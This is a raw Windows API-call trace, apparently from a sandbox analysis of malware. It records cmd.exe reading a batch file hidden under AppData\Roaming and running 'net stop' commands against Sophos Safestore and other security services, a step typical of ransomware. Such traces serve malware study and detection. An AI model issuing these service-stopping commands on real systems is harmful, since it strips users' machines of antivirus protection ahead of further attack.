GetProcessHeap () returned 0x3e0000 [0207.998] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0207.998] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0207.998] _get_osfhandle (_FileHandle=1) returned 0x264 [0207.998] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0207.998] _get_osfhandle (_FileHandle=1) returned 0x264 [0207.998] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0207.998] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0207.998] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0207.998] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0207.999] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0207.999] SetConsoleInputExeNameW () returned 0x1 [0207.999] GetConsoleOutputCP () returned 0x1b5 [0207.999] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0207.999] SetThreadUILanguage (LangId=0x0) returned 0x409 [0207.999] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0207.999] _open_osfhandle (_OSFileHandle=0x74, _Flags=8) returned 3 [0207.999] _get_osfhandle (_FileHandle=3) returned 0x74 [0207.999] SetFilePointer (in: hFile=0x74, lDistanceToMove=4364, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x110c [0207.999] GetProcessHeap () returned 0x3e0000 [0207.999] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0207.999] GetProcessHeap () returned 0x3e0000 [0207.999] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0207.999] GetProcessHeap () returned 0x3e0000 [0208.000] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0208.000] GetProcessHeap () returned 0x3e0000 [0208.000] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0208.000] GetProcessHeap () returned 0x3e0000 [0208.000] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0208.000] GetProcessHeap () returned 0x3e0000 [0208.000] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0208.000] GetProcessHeap () returned 0x3e0000 [0208.000] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0208.000] GetProcessHeap () returned 0x3e0000 [0208.000] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0208.000] GetProcessHeap () returned 0x3e0000 [0208.000] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0208.000] GetProcessHeap () returned 0x3e0000 [0208.000] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0208.000] GetProcessHeap () returned 0x3e0000 [0208.000] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3ff0 | out: hHeap=0x3e0000) returned 1 [0208.000] GetProcessHeap () returned 0x3e0000 [0208.000] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0208.000] GetProcessHeap () returned 0x3e0000 [0208.000] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0208.000] _get_osfhandle (_FileHandle=3) returned 0x74 [0208.000] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x110c [0208.000] ReadFile (in: hFile=0x74, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x7b5, lpOverlapped=0x0) returned 1 [0208.000] SetFilePointer (in: hFile=0x74, lDistanceToMove=4408, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1138 [0208.000] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=44, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop ΓÇ£Sophos Safestore ServiceΓÇ¥ /y\r\neΓÇ¥ /y\r\nures\r\nnded\r\n") returned 44 [0208.001] _get_osfhandle (_FileHandle=3) returned 0x74 [0208.001] GetFileType (hFile=0x74) returned 0x1 [0208.001] _get_osfhandle (_FileHandle=3) returned 0x74 [0208.001] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1138 [0208.001] GetProcessHeap () returned 0x3e0000 [0208.001] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3fdad8 [0208.001] GetProcessHeap () returned 0x3e0000 [0208.001] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fdad8 | out: hHeap=0x3e0000) returned 1 [0208.004] _tell (_FileHandle=3) returned 4408 [0208.004] _close (_FileHandle=3) returned 0 [0208.004] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0208.004] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0208.004] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0208.004] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0208.004] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0208.004] _wcsicmp (_String1="net", _String2="CD") returned 11 [0208.004] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0208.004] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0208.004] _wcsicmp (_String1="net", _String2="REN") returned -4 [0208.004] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0208.004] _wcsicmp (_String1="net", _String2="SET") returned -5 [0208.004] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0208.004] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0208.005] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0208.005] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0208.005] _wcsicmp (_String1="net", _String2="MD") returned 1 [0208.005] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0208.005] _wcsicmp (_String1="net", _String2="RD") returned -4 [0208.005] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0208.005] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0208.005] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0208.005] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0208.005] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0208.005] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0208.005] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0208.005] _wcsicmp (_String1="net", _String2="VER") returned -8 [0208.005] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0208.005] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0208.005] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0208.005] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0208.005] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0208.005] _wcsicmp (_String1="net", _String2="START") returned -5 [0208.005] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0208.005] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0208.005] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0208.005] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0208.005] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0208.005] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0208.005] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0208.005] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0208.005] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0208.005] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0208.006] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0208.006] SetErrorMode (uMode=0x0) returned 0x1 [0208.006] GetProcessHeap () returned 0x3e0000 [0208.006] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0208.006] GetProcessHeap () returned 0x3e0000 [0208.006] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0208.006] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0208.006] GetProcessHeap () returned 0x3e0000 [0208.006] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0208.006] GetProcessHeap () returned 0x3e0000 [0208.006] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0208.007] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6d58, Size=0x122) returned 0x3f6d58 [0208.007] GetProcessHeap () returned 0x3e0000 [0208.007] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6d58) returned 0x122 [0208.007] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0208.007] GetProcessHeap () returned 0x3e0000 [0208.007] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0208.007] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0208.007] GetProcessHeap () returned 0x3e0000 [0208.007] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0208.007] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0208.008] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0208.008] GetLastError () returned 0x2 [0208.008] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0208.008] GetLastError () returned 0x2 [0208.009] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0208.009] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0208.009] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0208.010] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0208.010] GetLastError () returned 0x2 [0208.010] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0208.010] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0208.011] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0208.011] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0208.011] SetErrorMode (uMode=0x0) returned 0x1 [0208.011] GetProcessHeap () returned 0x3e0000 [0208.011] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0208.011] GetProcessHeap () returned 0x3e0000 [0208.011] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0208.012] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0208.012] GetProcessHeap () returned 0x3e0000 [0208.012] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0208.012] GetProcessHeap () returned 0x3e0000 [0208.012] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0208.012] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7018, Size=0x122) returned 0x3f7018 [0208.012] GetProcessHeap () returned 0x3e0000 [0208.012] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7018) returned 0x122 [0208.012] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0208.012] GetProcessHeap () returned 0x3e0000 [0208.012] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7148 [0208.013] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7148, Size=0x76) returned 0x3f7148 [0208.013] GetProcessHeap () returned 0x3e0000 [0208.013] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7148) returned 0x76 [0208.013] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0208.014] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0208.014] GetLastError () returned 0x2 [0208.014] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0208.014] GetLastError () returned 0x2 [0208.014] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0208.015] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f8278 [0208.015] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0208.015] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0208.015] GetLastError () returned 0x2 [0208.016] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f8278 [0208.016] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0208.016] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0208.016] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0208.016] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0208.017] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0208.017] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0208.017] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop ΓÇ£Sophos Safestore ServiceΓÇ¥ /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop ΓÇ£Sophos Safestore ServiceΓÇ¥ /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop ΓÇ£Sophos Safestore ServiceΓÇ¥ /y", lpProcessInformation=0x3beae0*(hProcess=0x78, hThread=0x74, dwProcessId=0x8e0, dwThreadId=0x33c)) returned 1 [0208.021] CloseHandle (hObject=0x74) returned 1 [0208.021] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0208.021] GetProcessHeap () returned 0x3e0000 [0208.021] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0208.021] GetEnvironmentStringsW () returned 0x3f8408* [0208.021] GetProcessHeap () returned 0x3e0000 [0208.021] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0208.021] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0208.021] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0208.172] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x1) returned 1 [0208.172] CloseHandle (hObject=0x78) returned 1 [0208.172] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000001") returned 8 [0208.172] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000001") returned 1 [0208.172] GetProcessHeap () returned 0x3e0000 [0208.172] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0208.172] GetEnvironmentStringsW () returned 0x3f8408* [0208.172] GetProcessHeap () returned 0x3e0000 [0208.172] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0208.173] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0208.173] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0208.173] GetProcessHeap () returned 0x3e0000 [0208.173] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0208.173] GetEnvironmentStringsW () returned 0x3f8408* [0208.173] GetProcessHeap () returned 0x3e0000 [0208.173] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0208.173] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0208.173] GetProcessHeap () returned 0x3e0000 [0208.173] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0208.173] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0208.173] _get_osfhandle (_FileHandle=1) returned 0x264 [0208.173] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0208.173] _get_osfhandle (_FileHandle=1) returned 0x264 [0208.173] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0208.174] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0208.174] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0208.174] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0208.174] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0208.174] SetConsoleInputExeNameW () returned 0x1 [0208.174] GetConsoleOutputCP () returned 0x1b5 [0208.174] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0208.174] SetThreadUILanguage (LangId=0x0) returned 0x409 [0208.174] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0208.175] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0208.175] _get_osfhandle (_FileHandle=3) returned 0x78 [0208.175] SetFilePointer (in: hFile=0x78, lDistanceToMove=4408, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1138 [0208.175] GetProcessHeap () returned 0x3e0000 [0208.175] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0208.175] GetProcessHeap () returned 0x3e0000 [0208.175] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0208.175] GetProcessHeap () returned 0x3e0000 [0208.175] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0208.175] GetProcessHeap () returned 0x3e0000 [0208.175] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0208.175] GetProcessHeap () returned 0x3e0000 [0208.175] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fcaf0 | out: hHeap=0x3e0000) returned 1 [0208.175] GetProcessHeap () returned 0x3e0000 [0208.175] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0208.175] GetProcessHeap () returned 0x3e0000 [0208.175] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0208.175] GetProcessHeap () returned 0x3e0000 [0208.175] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0208.175] GetProcessHeap () returned 0x3e0000 [0208.175] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0208.175] GetProcessHeap () returned 0x3e0000 [0208.175] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0208.175] GetProcessHeap () returned 0x3e0000 [0208.175] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3ff0 | out: hHeap=0x3e0000) returned 1 [0208.175] GetProcessHeap () returned 0x3e0000 [0208.175] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0208.175] GetProcessHeap () returned 0x3e0000 [0208.175] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0208.175] _get_osfhandle (_FileHandle=3) returned 0x78 [0208.176] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1138 [0208.176] ReadFile (in: hFile=0x78, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x789, lpOverlapped=0x0) returned 1 [0208.176] SetFilePointer (in: hFile=0x78, lDistanceToMove=4436, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1154 [0208.176] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=28, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop svcGenericHost /y\r\n ServiceΓÇ¥ /y\r\neΓÇ¥ /y\r\nures\r\nnded\r\n") returned 28 [0208.176] _get_osfhandle (_FileHandle=3) returned 0x78 [0208.176] GetFileType (hFile=0x78) returned 0x1 [0208.176] _get_osfhandle (_FileHandle=3) returned 0x78 [0208.176] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1154 [0208.176] GetProcessHeap () returned 0x3e0000 [0208.176] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3fdad8 [0208.176] GetProcessHeap () returned 0x3e0000 [0208.176] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fdad8 | out: hHeap=0x3e0000) returned 1 [0208.179] _tell (_FileHandle=3) returned 4436 [0208.180] _close (_FileHandle=3) returned 0 [0208.180] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0208.180] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0208.180] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0208.180] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0208.180] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0208.180] _wcsicmp (_String1="net", _String2="CD") returned 11 [0208.180] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0208.180] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0208.180] _wcsicmp (_String1="net", _String2="REN") returned -4 [0208.180] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0208.180] _wcsicmp (_String1="net", _String2="SET") returned -5 [0208.180] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0208.180] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0208.180] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0208.180] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0208.180] _wcsicmp (_String1="net", _String2="MD") returned 1 [0208.180] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0208.180] _wcsicmp (_String1="net", _String2="RD") returned -4 [0208.180] _wcsicmp 